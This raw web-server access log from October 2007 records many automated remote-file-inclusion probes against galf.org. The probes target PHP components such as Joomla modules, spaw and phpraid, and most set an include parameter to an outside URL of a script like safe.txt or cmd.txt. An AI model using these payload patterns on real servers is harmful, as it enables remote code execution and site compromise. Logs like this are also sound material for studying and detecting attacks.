194.93.130.25 - - [28/Oct/2007:12:58:23 -0700] "GET /principal.php?cmd=http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.7.50 - - [28/Oct/2007:12:58:31 -0700] "GET /logs/access_070910.log/index.php?include=http://www.dunakom.hu/userimages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.13.228.115 - - [28/Oct/2007:12:58:44 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.familie-lasch.de/reports/idmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
64.13.228.115 - - [28/Oct/2007:12:58:44 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.familie-lasch.de/reports/idmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
88.131.153.91 - - [28/Oct/2007:13:00:16 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
209.35.191.105 - - [28/Oct/2007:13:00:23 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avelectronics.ca/cal//ws/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "galf.org"
209.35.191.105 - - [28/Oct/2007:13:00:23 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avelectronics.ca/cal//ws/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "galf.org"
69.93.209.250 - - [28/Oct/2007:13:02:16 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.213.246.61 - - [28/Oct/2007:13:02:21 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.familie-lasch.de/reports/idmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.213.246.61 - - [28/Oct/2007:13:02:21 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.familie-lasch.de/reports/idmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.216.213.40 - - [28/Oct/2007:13:02:34 -0700] "GET /logs/principal.php?cmd=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.213.40 - - [28/Oct/2007:13:02:34 -0700] "GET /principal.php?cmd=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.111.45.30 - - [28/Oct/2007:13:02:37 -0700] "GET /logs/principal.php?cmd=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.111.45.30 - - [28/Oct/2007:13:02:38 -0700] "GET /principal.php?cmd=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.135.119 - - [28/Oct/2007:13:02:39 -0700] "GET //announcements.php?phpraid_dir=http://qlzr.net/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [28/Oct/2007:13:05:04 -0700] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.surfbaby.net/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [28/Oct/2007:13:05:04 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.surfbaby.net/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [28/Oct/2007:13:05:04 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.surfbaby.net/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.213.40 - - [28/Oct/2007:13:05:09 -0700] "GET //spaw/dialogs/img_library.php?spaw_root=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.86.234.242 - - [28/Oct/2007:13:05:10 -0700] "GET /logs/access_070903.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.surfbaby.net/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.92.181 - - [28/Oct/2007:13:05:13 -0700] "GET /logs/access_070827.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.212.144 - - [28/Oct/2007:13:05:26 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.144 - - [28/Oct/2007:13:05:26 -0700] "GET /logs/?S=A HTTP/1.0" 200 5212 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
66.225.253.129 - - [28/Oct/2007:13:05:58 -0700] "GET /logs/access_070826.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:13:05:58 -0700] "GET /logs/access_070826.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.111.45.30 - - [28/Oct/2007:13:06:17 -0700] "GET //spaw/dialogs/img_library.php?spaw_root=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [28/Oct/2007:13:06:28 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:06:45 -0700] "GET /logs/access_071008.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:06:45 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:13:06:53 -0700] "GET /logs/access_071001.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:06:54 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.213.246.61 - - [28/Oct/2007:13:06:56 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.familie-lasch.de/reports/idmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
204.213.246.61 - - [28/Oct/2007:13:06:56 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.familie-lasch.de/reports/idmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
85.214.92.181 - - [28/Oct/2007:13:07:29 -0700] "GET /logs/access_071008.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.216.106 - - [28/Oct/2007:13:07:54 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:07:55 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://projects.papanature.net/includes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.58.151 - - [28/Oct/2007:13:08:07 -0700] "GET /index.php?pag=http://www.karadenizgaleri.com/karadenizforum/avatars/event/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:13:08:29 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path%22http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:13:08:29 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path%22http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:01 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:01 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:02 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:03 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:03 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.93.130.25 - - [28/Oct/2007:13:09:03 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:03 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:03 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:03 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:10 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:10 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.93.130.25 - - [28/Oct/2007:13:09:10 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.93.130.25 - - [28/Oct/2007:13:09:11 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://www.hotel-am-waldbad.de/redaxo/include/addons/image_resize/pages/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
70.86.234.242 - - [28/Oct/2007:13:09:13 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.92.181 - - [28/Oct/2007:13:10:10 -0700] "GET /logs/access_070625.log//announcements.php?phpraid_dir=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.92.181 - - [28/Oct/2007:13:10:10 -0700] "GET /logs//announcements.php?phpraid_dir=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.193.22.253 - - [28/Oct/2007:13:10:13 -0700] "GET /logs/access_070917.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.193.22.253 - - [28/Oct/2007:13:10:21 -0700] "GET /logs/access_070917.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.193.22.253 - - [28/Oct/2007:13:10:21 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.193.22.253 - - [28/Oct/2007:13:10:21 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.193.22.253 - - [28/Oct/2007:13:10:34 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.92.181 - - [28/Oct/2007:13:10:45 -0700] "GET /logs/access_070618.log//announcements.php?phpraid_dir=http://www.woman.fromland.net//language/lang_german/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.92.73.80 - - [28/Oct/2007:13:11:10 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.92.73.80 - - [28/Oct/2007:13:11:24 -0700] "GET /logs/access_070820.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/includes/pen.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.121.90.91 - - [28/Oct/2007:13:12:10 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.90.91 - - [28/Oct/2007:13:12:10 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.ownsyou.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
205.234.135.119 - - [28/Oct/2007:13:12:15 -0700] "GET /logs/access_070827.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://qlzr.net/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:13:12:32 -0700] "GET /logs/access_071001.log//spaw/dialogs/img_library.php?spaw_root=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
205.234.135.119 - - [28/Oct/2007:13:12:55 -0700] "GET /logs/access_070625.log//announcements.php?phpraid_dir=http://qlzr.net/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.135.119 - - [28/Oct/2007:13:12:55 -0700] "GET /logs//announcements.php?phpraid_dir=http://qlzr.net/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.135.119 - - [28/Oct/2007:13:13:13 -0700] "GET /logs/access_070618.log//announcements.php?phpraid_dir=http://qlzr.net/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [28/Oct/2007:13:13:24 -0700] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [28/Oct/2007:13:13:24 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [28/Oct/2007:13:13:27 -0700] "GET /logs/access_070903.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.surfbaby.net/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:13:31 -0700] "GET /logs/access_071008.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://projects.papanature.net/includes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:13:31 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://projects.papanature.net/includes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [28/Oct/2007:13:13:51 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://projects.papanature.net/includes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.135.119 - - [28/Oct/2007:13:14:15 -0700] "GET /logs/access_071008.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://qlzr.net/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.213.40 - - [28/Oct/2007:13:14:59 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.213.40 - - [28/Oct/2007:13:14:59 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.213.40 - - [28/Oct/2007:13:14:59 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
209.216.213.40 - - [28/Oct/2007:13:14:59 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
85.234.133.173 - - [28/Oct/2007:13:15:09 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://econfence.de/login/inc/idmic222.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
85.234.133.173 - - [28/Oct/2007:13:15:09 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://econfence.de/login/inc/idmic222.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.29.73.171 - - [28/Oct/2007:13:15:14 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.73.171 - - [28/Oct/2007:13:15:14 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [28/Oct/2007:13:15:14 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.73.171 - - [28/Oct/2007:13:15:14 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.111.45.30 - - [28/Oct/2007:13:15:15 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.111.45.30 - - [28/Oct/2007:13:15:15 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.111.45.30 - - [28/Oct/2007:13:15:15 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.111.45.30 - - [28/Oct/2007:13:15:16 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path%22http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
209.216.213.40 - - [28/Oct/2007:13:16:17 -0700] "GET /logs/access.log//spaw/dialogs/img_library.php?spaw_root=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.213.40 - - [28/Oct/2007:13:16:17 -0700] "GET /logs//spaw/dialogs/img_library.php?spaw_root=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:13:17:01 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.111.45.30 - - [28/Oct/2007:13:18:02 -0700] "GET /logs/access.log//spaw/dialogs/img_library.php?spaw_root=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.111.45.30 - - [28/Oct/2007:13:18:02 -0700] "GET /logs//spaw/dialogs/img_library.php?spaw_root=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.5.54.20 - - [28/Oct/2007:13:18:08 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.20 - - [28/Oct/2007:13:18:08 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
